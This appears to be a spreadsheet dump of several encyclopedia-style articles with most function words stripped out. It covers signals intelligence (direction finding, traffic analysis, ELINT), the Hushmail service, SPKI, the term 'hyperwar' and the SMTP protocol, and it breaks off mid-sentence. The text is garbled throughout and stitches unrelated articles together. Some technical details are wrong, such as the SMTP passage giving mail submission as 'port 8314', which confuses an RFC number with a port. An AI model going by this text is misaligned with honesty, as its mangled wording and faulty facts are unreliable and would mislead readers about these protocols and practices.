information central point, perhaps distributed system participate, information correlated location computed. intercept management modern sigint systems, therefore, substantial communications among intercept platforms. even platforms clandestine, still broadcast information telling look signals. united states targeting system development late 1990s, psts, constantly sends information helps interceptors properly antennas tune receivers. larger intercept aircraft, ep-3 rc-135, on-board capability target analysis planning, others, rc-12 guardrail, completely ground direction. guardrail aircraft fairly small, usually work units three cover tactical sigint requirement, larger aircraft tend assigned strategic/national missions. before detailed process targeting begins, someone decide value collecting information something. while would possible direct signals intelligence collection major sports event, systems would capture great deal noise, news signals, perhaps announcements stadium. however, anti-terrorist organization believed small group would trying coordinate efforts, using short-range unlicensed radios, event, sigint targeting radios type would reasonable. targeting would know stadium radios might located, exact frequency using; functions subsequent steps signal detection direction finding. once decision target made, various interception points need cooperate, since resources limited. knowing interception equipment becomes easier target country buys radars radios known manufacturers, given military aid. national intelligence services keep libraries devices manufactured country others, variety techniques learn equipment acquired given country. knowledge physics electronic engineering narrows problem types equipment might use. intelligence aircraft flying well outside borders another country listen long-range search radars, short-range fire control radars would used mobile defense. soldiers scouting front lines another army know side using radios must portable huge antennas. signal detection even signal human communications (e.g., radio), intelligence collection specialists know exists. targeting function described learns country radar operates certain frequency range, first step sensitive receiver, antennas listen every direction, find area radar operating. once radar known area, next step find location. operators know probable frequencies transmissions interest, receivers, preset frequencies interest. these frequency (horizontal axis) versus power (vertical axis) produced transmitter, filtering signals information transmitted. received energy particular frequency start recorder, alert human listen signals intelligible (i.e., comint). frequency known, operators look power primary sideband frequencies using spectrum analyzer. information spectrum analyzer used tune receivers signals interest. example, simplified spectrum, actual information mhz. real-world transmitters receivers usually directional. figure left, assume display connected spectrum analyzer connected directional antenna aimed indicated direction. countermeasures interception spread-spectrum communications electronic counter-countermeasures (eccm) technique defeat looking particular frequencies. spectrum analysis used different eccm identify frequencies jammed use. direction-finding earliest, still common, means direction finding directional antennas goniometers, line drawn receiver position signal interest. (see hf/df.) knowing compass bearing, single point, transmitter locate where bearings multiple points, using goniometry, plotted map, transmitter located point bearings intersect. this simplest case; target confuse listeners multiple transmitters, giving signal different locations, switching pattern known user apparently random listener. individual directional antennas manually automatically turned find signal direction, slow signal short duration. alternative wullenweber array technique. method, several concentric rings antenna elements simultaneously receive signal, best bearing ideally clearly single antenna small set. wullenweber arrays high-frequency signals enormous, referred "elephant cages" users. alternative tunable directional antennas, large omnidirectional arrays wullenweber, measure time arrival signal multiple points, using similar method precise time synchronization. receivers ground stations, ships, aircraft, satellites, giving great flexibility. modern anti-radiation missiles home attack transmitters; military antennas rarely safe distance user transmitter. traffic analysis when locations known, usage patterns emerge, inferences drawn. traffic analysis discipline drawing patterns information flow among senders receivers, whether senders receivers designated location determined direction finding, addressee sender identifications message, even masint techniques "fingerprinting" transmitters operators. message content, sender receiver, necessary traffic analysis, although information helpful. example, certain type radio known used tank units, even position precisely determined direction finding, assumed tank unit general area signal. owner transmitter assume someone listening, might tank radios area wants side believe actual tanks. part operation quicksilver, part deception plan invasion europe battle normandy, radio transmissions simulated headquarters subordinate units fictitious first united states army group (fusag), commanded george patton, make german defense think main invasion come another location. like manner, fake radio transmissions japanese aircraft carriers, battle pearl harbor, made japanese local waters, attacking ships moved strict radio silence. traffic analysis need focus human communications. example, sequence radar signal, followed exchange targeting data confirmation, followed observation artillery fire, identify automated counterbattery system. radio signal triggers navigational beacons could landing system airstrip helicopter intended low-profile. patterns emerge. knowing radio signal, certain characteristics, originating fixed headquarters strongly suggestive particular unit soon move regular base. contents message need known infer movement. there well science traffic analysis. expert analysts develop sense real deceptive. harry kidder, example, star cryptanalysts world star hidden behind secret curtain sigint. electronic order battle generating electronic order battle (eob) requires identifying sigint emitters area interest, determining geographic location range mobility, characterizing signals, and, possible, determining role broader organizational order battle. covers comint elint. defense intelligence agency maintains location. joint spectrum center (jsc) defense information systems agency supplements location database five technical databases: frrs: frequency resource record system bei: background environment information scs: spectrum certification system ec/s: equipment characteristics/space tacdb: platform lists, sorted nomenclature, contain links equipment complement platform, links parametric data piece equipment, military unit lists subordinate units equipment used unit. example, several voice transmitters might identified command (i.e., commander direct reports) tank battalion tank-heavy task force. another transmitters might identify logistic unit. inventory elint sources might identify medium- long-range counter-artillery radars given area. signals intelligence units identify changes eob, might indicate enemy unit movement, changes command relationships, increases decreases capability. using comint gathering method enables intelligence officer produce electronic order battle traffic analysis content analysis among several enemy units. example, following messages intercepted: requesting permission proceed checkpoint approved. please report arrival. minutes later) vehicles arrived checkpoint x.this sequence shows units battlefield, unit mobile, unit higher hierarchical level, perhaps command post. also understand unit moved point another distant minutes vehicle. regular reports period time, might reveal patrol pattern. direction-finding radio frequency masint could help confirm traffic deception. buildup process divided following: signal separation measurements optimization data fusion networks build-upseparation intercepted spectrum signals intercepted sensor must take place extremely small period time, order separate different signals different transmitters battlefield. complexity separation process depends complexity transmission methods (e.g., hopping time-division multiple access (tdma)). gathering clustering data sensor, measurements direction signals optimized much accurate basic measurements standard direction finding sensor. calculating larger samples sensor's output data near real-time, together historical information signals, better results achieved. data fusion correlates data samples different frequencies sensor, "same" confirmed direction finding radiofrequency masint. emitter mobile, direction finding, discovering repetitive pattern movement, limited value determining sensor unique. masint becomes informative, individual transmitters antennas unique side lobes, unintentional radiation, pulse timing, etc. network build-up, analysis emitters (communication transmitters) target region sufficient period time, enables creation communications flows battlefield. communications intelligence comint (communications intelligence) sub-category signals intelligence engages dealing messages voice information derived interception foreign communications. comint commonly referred sigint, cause confusion talking broader intelligence disciplines. joint chiefs staff defines "technical information intelligence derived foreign communications intended recipients".comint, defined communications among people, reveal following: transmitting where located, and, transmitter moving, report give plot signal location known, organizational function transmitter time duration transmission, schedule periodic transmission frequencies technical characteristics transmission transmission encrypted not, decrypted. possible intercept either originally transmitted cleartext obtain cryptanalysis, language communication translation (when needed). addresses, signal general broadcast addresses retrievable message. these stations also comint (e.g., confirmation message response message), elint (e.g., navigation beacon activated) both. rather than, addition address identifier, information location signal characteristics responder. voice interception basic comint technique listen voice communications, usually radio possibly "leaking" telephones wiretaps. voice communications encrypted, traffic analysis still give information. second world war, security united states used native american volunteer communicators known code talkers, used languages navajo, comanche choctaw, would understood people, even u.s. even within uncommon languages, code talkers used specialized codes, "butterfly" might specific japanese aircraft. british forces made limited welsh speakers reason. while modern electronic encryption away need armies obscure languages, likely groups might rare dialects outside ethnic group would understand. text interception morse code interception important, morse code telegraphy obsolete western world, although possibly used special operations forces. such forces, however, portable cryptographic equipment. specialists scan radio frequencies character sequences (e.g., electronic mail) fax. signaling channel interception given digital communications link carry thousands millions voice communications, especially developed countries. without addressing legality actions, problem identifying channel contains conversation becomes much simpler first thing intercepted signaling channel carries information telephone calls. civilian many military use, channel carry messages signaling system protocols. retrospective analysis telephone calls made call detail record (cdr) used billing calls. monitoring friendly communications more part communications security true intelligence collection, sigint units still responsibility monitoring one's communications electronic emissions, avoid providing intelligence enemy. example, security monitor hear individual transmitting inappropriate information unencrypted radio network, simply authorized type information given. immediately calling attention violation would create even greater security risk, monitor call beadwindow codes used australia, canada, zealand, united kingdom, united states, nations working procedures. standard beadwindow codes (e.g., "beadwindow include: position: (e.g., disclosing, insecure inappropriate way), "friendly enemy position, movement intended movement, position, course, speed, altitude destination air, ground element, unit force." capabilities: "friendly enemy capabilities limitations. force compositions significant casualties special equipment, weapons systems, sensors, units personnel. percentages fuel ammunition remaining." operations: "friendly enemy operation intentions progress, results. operational logistic intentions; mission participants flying programmes; mission situation reports; results friendly enemy operations; assault objectives." electronic warfare (ew): "friendly enemy electronic warfare (ew) emanations control (emcon) intentions, progress, results. intention employ electronic countermeasures (ecm); results friendly enemy ecm; objectives; results friendly enemy electronic counter-countermeasures (eccm); results electronic support measures/tactical sigint (esm); present intended emcon policy; equipment affected emcon policy." friendly enemy personnel: "movement identity friendly enemy officers, visitors, commanders; movement maintenance personnel indicating equipment limitations." communications security (comsec): "friendly enemy comsec breaches. linkage codes codewords plain language; compromise changing frequencies linkage line number/circuit designators; linkage changing call signs previous call signs units; compromise encrypted/classified call signs; incorrect authentication procedure." wrong circuit: "inappropriate transmission. information requested, transmitted transmitted passed subject circuit either requires greater security protection appropriate purpose circuit provided." other codes appropriate situation defined commander.in wwii, example, japanese navy, poor practice, identified person's movement low-security cryptosystem. this made possible operation vengeance, interception death combined fleet commander, admiral isoroku yamamoto. electronic signals intelligence electronic signals intelligence (elint) refers intelligence-gathering electronic sensors. primary focus lies non-communications signals intelligence. joint chiefs staff define "technical geolocation intelligence derived foreign noncommunications electromagnetic radiations emanating sources nuclear detonations radioactive sources."signal identification performed analyzing collected parameters specific signal, either matching known criteria, recording possible emitter. elint data usually highly classified, protected such. data gathered typically pertinent electronics opponent's defense network, especially electronic parts radars, surface-to-air missile systems, aircraft, etc. elint used detect ships aircraft radar electromagnetic radiation; commanders make choices using radar (emcon), intermittently using using expecting avoid defenses. elint collected ground stations near opponent's territory, ships coast, aircraft near airspace, satellite. complementary relationship comint combining sources information elint allows traffic analysis performed electronic emissions contain human encoded messages. method analysis differs sigint human encoded message electronic transmission analyzed elint. what interest type electronic transmission location. example, battle atlantic world ultra comint always available bletchley park always able read u-boat enigma traffic. high-frequency direction finding ("huff-duff") still able detect u-boats analysis radio transmissions positions triangulation direction located huff-duff systems. admiralty able information plot courses took convoys away high concentrations u-boats. other elint disciplines include intercepting analyzing enemy weapons control signals, identification, friend responses transponders aircraft used distinguish enemy craft friendly ones. role warfare common area elint intercepting radars learning locations operating procedures. attacking forces able avoid coverage certain radars, knowing characteristics, electronic warfare units radars send deceptive signals. confusing radar electronically called "soft kill", military units also send specialized missiles radars, bomb them, "hard kill". some modern air-to-air missiles also radar homing guidance systems, particularly large airborne radars. knowing surface-to-air missile anti-aircraft artillery system type means raids plotted avoid heavily defended areas flight profile give aircraft best chance evading ground fire fighter patrols. also allows jamming spoofing enemy's defense network (see electronic warfare). good electronic intelligence important stealth operations; stealth aircraft totally undetectable need know areas avoid. similarly, conventional aircraft need know fixed semi-mobile defense systems shut around them. elint electronic support measures (esm) electronic surveillance measures elint techniques using various electronic surveillance systems, term used specific context tactical warfare. give information needed electronic attack (ea) jamming, directional bearings (compass angle) target signals intercept huff-duff radio direction finding (rdf) systems critically important world battle atlantic. after wwii, rdf, originally applied communications, broadened systems also take elint radar bandwidths lower frequency communications systems, giving birth family nato systems, shipboard an/wlr-1—an/wlr-6 systems comparable airborne units. also called electronic counter-measures (ecm). provides information needed electronic counter-counter measures (eccm), understanding spoofing jamming mode change one's radar characteristics avoid them. elint meaconing meaconing combined intelligence electronic warfare learning characteristics enemy navigation aids, radio beacons, retransmitting incorrect information. foreign instrumentation signals intelligence fisint (foreign instrumentation signals intelligence) sub-category sigint, monitoring primarily non-human communication. foreign instrumentation signals include (but limited telemetry (telint), tracking systems, video data links. telint important part national means technical verification arms control. counter-elint still research level techniques described counter-elint, would part sead campaign. informative compare contrast counter-elint eccm. sigint versus masint signals intelligence measurement signature intelligence (masint) closely, sometimes confusingly, related. signals intelligence disciplines communications electronic intelligence focus information signals themselves, comint detecting speech voice communication elint measuring frequency, pulse repetition rate, characteristics radar. masint also works collected signals, analysis discipline. there are, however, unique masint sensors, typically working different regions domains electromagnetic spectrum, infrared magnetic fields. while agencies masint groups, central masint office defense intelligence agency (dia). where comint elint focus intentionally transmitted part signal, masint focuses unintentionally transmitted information. example, given radar antenna sidelobes emanating direction main antenna aimed. radint (radar intelligence) discipline involves learning recognize radar primary signal, captured elint, sidelobes, perhaps captured main elint sensor, likely, sensor aimed sides radio antenna. masint associated comint might involve detection common background sounds expected human voice communications. example, given radio signal comes radio used tank, interceptor hear engine noise higher voice frequency voice modulation usually uses, even though voice conversation meaningful, masint might suggest deception, coming real tank. hf/df discussion sigint-captured information masint flavor, determining frequency receiver tuned, detecting frequency beat frequency oscillator superheterodyne receiver. legality since invention radio, international consensus radio-waves one's property, thus interception illegal. there however national laws allowed collect, store process radio traffic, purposes. monitoring traffic cables (i.e. telephone internet) controversial, since time requires physical access cable thereby violating ownership expected privacy. also references further reading bamford, james, body secrets: america's britain's gchq eavesdrop world (century, london, 2001) isbn 978-0-7126-7598-7 bolton, matt (december 2011). "the tallinn cables: glimpse tallinn's secret history espionage" (pdf). lonely planet magazine. issn 1758-6526. archived original (pdf) november 2013. retrieved june 2013. biyd, harris, king, jr.; welch, eds. (1979) [1961]. electronic countermeasures. altos, peninsula. isbn 0-932146-00-7. gannon, paul (2007) [2006]. colossus: bletchley park's greatest secret. london: atlantic books. isbn 978-1-84354-331-2. jõgiaas, aadu. "disturbing soviet transmissions august 1991". museum occupations. archived original november 2011. retrieved june 2013. west, nigel, sigint secrets: signals intelligence war, 1900 today (william morrow, york, 1988) external links media related sigint wikimedia commons part articles evolution army signal corps comint sigint nsa's overview sigint usaf pamphlet sources intelligence german wwii sigint/comint intelligence programs systems u.s. intelligence community jeffrey richelson secrets signals intelligence during cold beyond matthew maritime sigint architecture technical standards handbook</t>
  </si>
  <si>
    <t>Hushmail</t>
  </si>
  <si>
    <t>hushmail encrypted proprietary web-based email service offering pgp-encrypted e-mail vanity domain service. hushmail uses openpgp standards. public encryption keys available recipient sender (either hushmail users uploaded keys hush keyserver), hushmail convey authenticated, encrypted messages directions. recipients public available, hushmail allow message encrypted password (with password hint) stored pickup recipient, message sent cleartext. july, 2016, company launched offers end-to-end encryption full integration webmail settings. company located vancouver, british columbia, canada. history hushmail founded cliff baltzley 1999 left ultimate privacy. accounts individuals there type paid account, hushmail premium, provides 10gb storage, well imap pop3 service. hushmail offers two-week free trial account. businesses standard business account provides features paid individual account, plus features like vanity domain, email forwarding, catch-all email user admin. standard business plan email archiving also available. features like secure forms email archiving found healthcare legal industry-specific plans.additional security features include hidden addresses e-mail headers, two-step verification hipaa compliant encryption. instant messaging instant messaging service, hush messenger, offered july 2011. compromises email privacy hushmail received favorable reviews press. believed possible threats, demands legal system reveal content traffic system, imminent canada unlike united states data handed over, encrypted messages would available encrypted form. developments november 2007 doubts amongst security-conscious users hushmail's security specifically, concern backdoor. issue originated non-java version hush system. performed encrypt/decrypt steps hush's servers, used transmit data user. data available cleartext small window time, passphrase capturable point, facilitating decryption stored messages future messages using passphrase. hushmail stated java version also vulnerable, compelled deliver compromised java applet user.hushmail supplied cleartext copies private email messages associated several addresses request enforcement agencies mutual legal assistance treaty united states: e.g. case united states stumbo. addition, contents emails hushmail addresses analyzed, supplied u.s. authorities. hushmail privacy policy states logs addresses order analyze market trends, gather broad demographic information, prevent abuse services."hush communications, company provides hushmail, states release user data without court order supreme court british columbia, canada, countries seeking access user data must apply government canada applicable mutual legal assistance treaty. hushmail states, "...that means guarantee compelled, court order issued supreme court british columbia, canada, treat user named court order differently, compromise user's privacy" "[...]if court order issued supreme court british columbia compelling reveal content encrypted email, "attacker" could hush communications, actual service provider." also comparison mail servers comparison webmail providers references external links official website</t>
  </si>
  <si>
    <t>Simple public-key infrastructure</t>
  </si>
  <si>
    <t>simple public infrastructure (spki, pronounced spoo-key) attempt overcome complexity traditional x.509 public infrastructure. specified internet engineering task force (ietf) request comments (rfc) specifications—rfc 2692 2693—from ietf spki working group. these rfcs never passed "experimental" maturity level ietf's status. spki specification defined authorization certificate format, providing delineation privileges, rights attributes (called authorizations) binding public key. 1996, spki merged simple distributed security infrastructure (sdsi, pronounced sudsy) rivest butler lampson. history overview original spki identified principals public keys allowed binding authorizations keys delegation authorization another. encoding used attribute:value pairing, similar headers. original sdsi bound local names individuals groups) public keys names), carried authorization access control lists (acls) allow delegation subsets principal's authorization. encoding used standard s-expression. sample public spki "advanced transport format" (for actual transport structure would base64-encoded): (public-key (rsa-pkcs1-md5 #03#) |anhcg85jxfgmicr3mgpj53fyysy1awaue6pknpferhhkmja4hrk4wskto yttlaprznneld2d7lwd3q8pd0lyi1njpnzmkxqvhrraniqoczeozuiz/yy vdzj1ddiimixyb/jyme3d0uiuxhd6vgaz0x0cgrkefknmjy410kro3uw1| combined spki/sdsi allows naming principals, creation named groups principals delegation rights attributes principal another. includes language expression authorization language includes definition "intersection" authorizations. also includes notion threshold subject construct granting authorizations delegations) {\displaystyle {\displaystyle listed subjects concur request access delegation rights). spki/sdsi uses s-expression encoding, specifies binary form extremely easy parse lr(0) grammar called canonical s-expressions. spki/sdsi define role commercial certificate authority (ca). fact, premise behind spki commercial serves useful purpose. result that, spki/sdsi deployed primarily closed solutions demonstration projects academic interest. another side-effect design element difficult monetize spki/sdsi itself. component product, business case developing spki/sdsi tools services except part product. prominent general deployments spki/sdsi e-speak, middleware product used spki/sdsi access control methods, upnp security, uses dialect spki/sdsi access control methods, delegation rights among network participants, etc. also spkac notes external links spki homepage, jsdsi (open source development effort) cdsa (open source development effort).</t>
  </si>
  <si>
    <t>Hyperwar</t>
  </si>
  <si>
    <t>hyperwar (portmanteau ancient greek preposition prefix ὑπέρ "beyond" english "war") term coined john allen amir husain refers algorithmic "ai"-controlled warfare little human decision making. autonomous nature could rapidly increase speed warfare, especially side relying limited weapons drones cyberwar, affect forms military planning. also artificial intelligence cyberwarfare links european security technology, esut.de hyperwar challenges army development november 2020, stefan krempl: machine warfare: from drone swarm hyperwar references</t>
  </si>
  <si>
    <t>Simple Mail Transfer Protocol</t>
  </si>
  <si>
    <t>simple mail transfer protocol (smtp) internet standard communication protocol electronic mail transmission. mail servers message transfer agents smtp send receive mail messages. user-level email clients typically smtp sending messages mail server relaying, typically submit outgoing email mail server port 8314. retrieving messages, imap (which replaced older pop3) standard, proprietary servers also often implement proprietary protocols, e.g., exchange activesync. smtp's origins began 1980, building concepts implemented arpanet since 1971. updated, modified extended multiple times. protocol version common today extensible structure various extensions authentication, encryption, binary data transfer, internationalized email addresses. smtp servers commonly transmission control protocol port number (for plaintext) (for encrypted communications). history predecessors smtp various forms one-to-one electronic messaging used 1960s. users communicated using systems developed specific mainframe computers. computers interconnected, especially u.s. government's arpanet, standards developed permit exchange messages different operating systems. smtp grew standards developed 1970s. mail arpanet traces roots 1971: mail protocol, implemented, discussed 196; sndmsg program, tomlinson adapted year send messages across computers arpanet. proposal mail protocol made june 1973, implemented.the file transfer protocol (ftp) "network mail" arpanet proposed march 1973. through 561, 680, 724, finally november 1977, standardized framework "electronic mail" using mail servers developed. original smtp 1980, postel suzanne sluizer published proposed mail transfer protocol replacement mail. 1981 removed references allocated port udp, allocation since removed iana. november 1981, postel published "simple mail transfer protocol". smtp standard developed around time usenet, one-to-many communication network similarities.smtp became widely used early 1980s. time, complement unix unix copy program (uucp), better suited handling email transfers machines intermittently connected. smtp, hand, works best sending receiving machines connected network time. both used store forward mechanism examples push technology. though usenet's newsgroups still propagated uucp servers, uucp mail transport virtually disappeared along "bang paths" used message routing headers.sendmail, released 4.1cbsd 1983, first mail transfer agents implement smtp. over time, unix became popular operating system internet, sendmail became common (mail transfer agent).the original smtp protocol supported unauthenticated unencrypted 7-bit ascii text communications, susceptible trivial man-in-the-middle attack, spoofing, spamming, requiring binary data encoded readable text transmission. absence proper authentication mechanism, design every smtp server open mail relay. internet mail consortium (imc) reported mail servers open relays 1998, less 2002. because spam concerns email providers blocklist open relays, making original smtp essentially impractical general internet. modern smtp november 1995, 1869 defined extended simple mail transfer protocol (esmtp), established general structure existing future extensions aimed add-in features missing original smtp. esmtp defines consistent manageable means esmtp clients servers identified servers indicate supported extensions. message submission (rfc 2476) smtp-auth (rfc 2554) introduced 1998 1999, describing trends email delivery. originally, smtp servers typically internal organization, receiving mail organization outside, relaying messages organization outside. time went smtp servers (mail transfer agents), practice, expanding roles become message submission agents mail user agents, relaying mail outside organization. (e.g. company executive wishes send email trip using corporate smtp server.) this issue, consequence rapid expansion popularity world wide web, meant smtp include specific rules methods relaying mail authenticating users prevent abuses relaying unsolicited email (spam). work message submission (rfc 2476) originally started popular mail servers would often rewrite mail attempt problems example, adding domain name unqualified address. this behavior helpful message fixed initial submission, dangerous harmful message originated elsewhere relayed. cleanly separating mail submission relay seen permit encourage rewriting submissions prohibiting rewriting relay. spam became prevalent, also seen provide authorization mail sent organization, well traceability. this separation relay submission quickly became foundation modern email security practices. protocol started purely ascii text-based, deal well binary files, characters many non-english languages. standards multipurpose internet mail extensions (mime) developed encode binary files transfer smtp. mail transfer agents (mtas) developed sendmail also tended implemented 8-bit clean, alternate "just send eight" strategy could used transmit arbitrary text data 8-bit ascii-like character encoding) smtp. mojibake still problem differing character mappings vendors, although email addresses still allowed ascii. 8-bit-clean mtas today tend support 8bitmime extension, permitting binary files transmitted almost easily plain text (limits line length permitted octet values still apply, mime encoding needed non-text data text formats). 2012, smtputf8 extension created support utf-8 text, allowing international content addresses non-latin scripts like cyrillic chinese. many people contributed core smtp specifications, among postel, eric allman, dave crocker, freed, randall gellens, john klensin, keith moore. mail processing model email submitted mail client (mail user agent, mua) mail server (mail submission agent, msa) using smtp port 587. most mailbox providers still allow submission traditional port delivers mail mail transfer agent (mail transfer agent, mta). often, agents instances software launched different options machine. local processing done either single machine, split among multiple machines; mail agent processes machine share files, processing multiple machines, transfer messages using smtp, machine configured next machine smart host. each process smtp server) right. boundary uses look (mail exchanger) record recipient's domain (the part email address right record contains name target mta. based target host factors, sending selects recipient server connects complete mail exchange. message transfer occur single connection mtas, series hops intermediary systems. receiving smtp server ultimate destination, intermediate "relay" (that stores forwards message) "gateway" (that forward message using protocol smtp). 5321 section 2.1, formal handoff responsibility message, whereby receiving server must either deliver message properly report failure once final accepts incoming message, hands mail delivery agent (mda) local delivery. saves messages relevant mailbox format. sending, reception done using multiple computers, diagram depicted near mail exchanger box. deliver messages directly storage, forward network using smtp protocol local mail transfer protocol (lmtp), derivative smtp designed purpose. once delivered local mail server, mail stored batch retrieval authenticated mail clients (muas). mail retrieved end-user applications, called email clients, using internet message access protocol (imap), protocol facilitates access mail manages stored mail, post office protocol (pop) typically uses traditional mbox mail file format proprietary system microsoft exchange/outlook lotus notes/domino. webmail clients either method, retrieval protocol often formal standard. smtp defines message transport, message content. thus, defines mail envelope parameters, envelope sender, header (except trace information) body message itself. 5321 define smtp (the envelope), 5322 define message (header body), formally referred internet message format. protocol overview smtp connection-oriented, text-based protocol mail sender communicates mail receiver issuing command strings supplying necessary data reliable ordered data stream channel, typically transmission control protocol (tcp) connection. smtp session consists commands originated smtp client (the initiating agent, sender, transmitter) corresponding responses smtp server (the listening agent, receiver) session opened, session parameters exchanged. session include zero smtp transactions. smtp transaction consists three command/reply sequences: mail command, establish return address, also called return-path, reverse-path, bounce address, mfrom, envelope sender. rcpt command, establish recipient message. this command issued multiple times, recipient. these addresses also part envelope. data signal beginning message text; content message, opposed envelope. consists message header message body separated empty line. data actually group commands, server replies twice: data command itself, acknowledge ready receive text, second time end-of-data sequence, either accept reject entire message.besides intermediate reply data, server's reply either positive (2xx reply codes) negative. negative replies permanent (5xx codes) transient (4xx codes). reject permanent failure client send bounce message server received from. drop positive response followed message discard rather delivery. initiating host, smtp client, either end-user's email client, functionally identified mail user agent (mua), relay server's mail transfer agent (mta), smtp server acting smtp client, relevant session, order relay mail. fully capable smtp servers maintain queues messages retrying message transmissions resulted transient failures. knows outgoing mail smtp server configuration. relay server typically determines server connect looking (mail exchange) resource record recipient's domain name. record found, conformant relaying server (not are) instead looks record. relay servers also configured smart host. relay server initiates connection server "well-known port" smtp: port connecting msa, port 587. main difference connecting requires smtp authentication. smtp mail retrieval smtp delivery protocol only. normal use, mail "pushed" destination mail server next-hop mail server) arrives. mail routed based destination server, individual user(s) addressed. other protocols, post office protocol (pop) internet message access protocol (imap) specifically designed individual users retrieving messages managing mail boxes. permit intermittently-connected mail server pull messages remote server demand, smtp feature initiate mail queue processing remote server (see remote message queue starting below). imap unsuitable protocols relaying mail intermittently-connected machines; designed operate final delivery, information critical correct operation mail relay (the "mail envelope") removed. remote message queue starting remote message queue starting enables remote host start processing mail queue server receive messages destined sending corresponding command. original turn command deemed insecure extended 1985 etrn command operates securely using authentication method based domain name system information. outgoing mail smtp server email client needs know address initial smtp server given part configuration (usually given name). this server deliver outgoing messages behalf user. outgoing mail server access restrictions server administrators need impose control clients server. this enables deal abuse, example spam. solutions common use: past, many systems imposed usage restrictions location client, permitting usage clients whose address server administrators control. usage client address disallowed. modern smtp servers typically offer alternative system requires authentication clients credentials allowing access. restricting access location under system, isp's smtp server allow access users outside isp's network. more precisely, server allow access users address provided isp, equivalent requiring connected internet using isp. mobile user often network normal isp, find sending email fails configured smtp server choice longer accessible. this system several variations. example, organisation's smtp server provide service users network, enforcing firewalling block access users wider internet. server perform range checks client's address. these methods typically used corporations institutions universities provided smtp server outbound mail internally within organisation. however, bodies client authentication methods, described below. where user mobile, different isps connect internet, kind usage restriction onerous, altering configured outbound email smtp server address impractical. highly desirable able email client configuration information need change. client authentication modern smtp servers typically require authentication clients credentials allowing access, rather restricting access location described earlier. this flexible system friendly mobile users allows fixed choice configured outbound smtp server. smtp authentication, often abbreviated smtp auth, extension smtp order using authentication mechanism. ports communication mail servers generally uses standard port designated smtp. mail clients however generally this, instead using specific "submission" ports. mail services generally accept email submission clients (submission), formalized 6409 (previously 2476) this port deprecated 2487, issue 8314.port 2525 others used individual providers, never officially supported. many internet service providers block outgoing port traffic customers. mainly anti-spam measure, also cure higher cost leaving open, perhaps charging customers require open. smtp transport example typical example sending message smtp mailboxes (alice theboss) located mail domain (example.com) reproduced following session exchange. example, conversation parts prefixed server client, respectively; labels part exchange.) after message sender (smtp client) establishes reliable communications channel message receiver (smtp server), session opened greeting server, usually containing fully qualified domain name (fqdn), case smtp.example.com. client initiates dialog responding helo command identifying command's parameter fqdn address literal none available). smtp.example.com esmtp postfix helo relay.example.org hello relay.example.org, glad meet mail from:&lt;bob@example.org&gt; rcpt to:&lt;alice@example.com&gt; rcpt to:&lt;theboss@example.com&gt; data data &lt;cr&gt;&lt;lf&gt;.&lt;cr&gt;&lt;lf&gt; from: "bob example" &lt;bob@example.org&gt; "alice example" &lt;alice@example.com&gt; theboss@example.com date: tue, 2008 16:02:43 -0500 subject: test message hello alice. this test message header fields lines message body. your friend, queued 12345 quit {the server closes connection} client notifies receiver originating email address message mail from command. this also return bounce address case message cannot delivered. example email message sent mailboxes smtp server: recipient listed header fields. corresponding smtp command rcpt each successful reception execution command acknowledged server result code response message (e.g., ok). transmission body mail message initiated data command transmitted verbatim line line terminated end-of-data sequence. this sequence consists new-line (&lt;cr&gt;&lt;lf&gt;), single full stop (.), followed another new-line (&lt;cr&gt;&lt;lf&gt;). since message body contain line period part text, client sends periods every time line starts period; correspondingly, server replaces every sequence periods beginning line single one. such escaping method called dot-stuffing. server's positive reply end-of-data, exemplified, implies server taken responsibility delivering message. message doubled communication failure time, e.g. power shortage: until sender received reply, must assume message delivered. hand, receiver decided accept message, must assume message delivered thus, time span, agents active copies message deliver. probability communication failure occurs exactly step directly proportional amount filtering server performs message body, often anti-spam purposes. limiting timeout specified minutes.the quit command ends session. email recipients located elsewhere, client would quit connect appropriate smtp server subsequent recipients current destination(s) queued. information client sends helo mail from commands added (not seen example code) additional header fields message receiving server. adds received return-path header field, respectively. some clients implemented close connection message accepted (250 queued 12345), last lines actually omitted. this causes error server trying send reply. smtp extensions extension discovery mechanism clients learn server's supported options using ehlo greeting, exemplified below, instead original helo. clients fall back helo server support ehlo greeting.modern clients esmtp extension keyword size query server maximum message size accepted. older clients servers transfer excessively sized messages rejected consuming network resources, including connect time network links paid minute.users manually determine advance maximum size accepted esmtp servers. client replaces helo command ehlo command. smtp2.example.com esmtp postfix ehlo bob.example.org 250-smtp2.example.com hello bob.example.org [192.0.2.201] 250-size 14680064 250-pipelining help thus smtp2.example.com declares accept fixed maximum message size larger 14,680,064 octets (8-bit bytes). simplest case, esmtp server declares maximum size immediately receiving ehlo. according 1870, however, numeric parameter size extension ehlo response optional. clients instead, issuing mail from command, include numeric estimate size message transferring, server refuse receipt overly-large messages. binary data transfer original smtp supports single body ascii text, therefore binary data needs encoded text body message transfer, decoded recipient. binary-to-text encodings, uuencode binhex typically used. 8bitmime command developed address this. standardized 1994 1652 facilitates transparent exchange e-mail messages containing octets outside seven-bit ascii character encoding mime content parts, typically encoded base64. mail delivery mechanism extensions on-demand mail relay on-demand mail relay (odmr) smtp extension standardized 2645 allows intermittently-connected smtp server receive email queued connected. internationalization extension original smtp supports email addresses composed ascii characters only, inconvenient users whose native script latin based, diacritic ascii character set. this limitation alleviated extensions enabling utf-8 address names. 5336 introduced experimental utf8smtp command later superseded 6531 introduced smtputf8 command. these extensions provide support multi-byte non-ascii characters email addresses, diacritics language characters greek chinese.current support limited, strong interest broad adoption 6531 related rfcs countries like china large user base latin (ascii) foreign script. extensions like smtp, esmtp protocol used transport internet mail. used inter-server transport protocol (with restricted behavior enforced) mail submission protocol. main identification feature esmtp clients open transmission command ehlo (extended hello), rather helo (hello, original standard). server respond success (code 250), failure (code 550) error (code 500, 501, 502, 504, 421), depending configuration. esmtp server returns code multi-line reply domain list keywords indicate supported extensions. compliant server returns error code 500, allowing esmtp clients either helo quit. each service extension defined approved format subsequent rfcs registered internet assigned numbers authority (iana). first definitions optional services: send, soml (send mail), saml (send mail), expn, help, turn. format additional smtp verbs parameters mail rcpt. some relatively common keywords (not corresponding commands) used today are: 8bitmime data transmission, 6152 atrn authenticated turn on-demand mail relay, 2645 auth authenticated smtp, 4954 chunking chunking, 3030 delivery status notification, 3461 (see variable envelope return path) etrn extended version remote message queue starting command turn, 1985 help supply helpful information, pipelining command pipelining, 2920 size message size declaration, 1870 starttls transport layer security, 3207 (2002) smtputf8 allow utf-8 encoding mailbox names header fields, 6531 utf8smtp allow utf-8 encoding mailbox names header fields, 5336 (deprecated)the esmtp format restated 2821 (superseding 821) updated latest definition 5321 2008. support ehlo command servers became mandatory, helo designated required fallback. non-standard, unregistered, service extensions used bilateral agreement, services indicated ehlo message keyword starting "x", additional 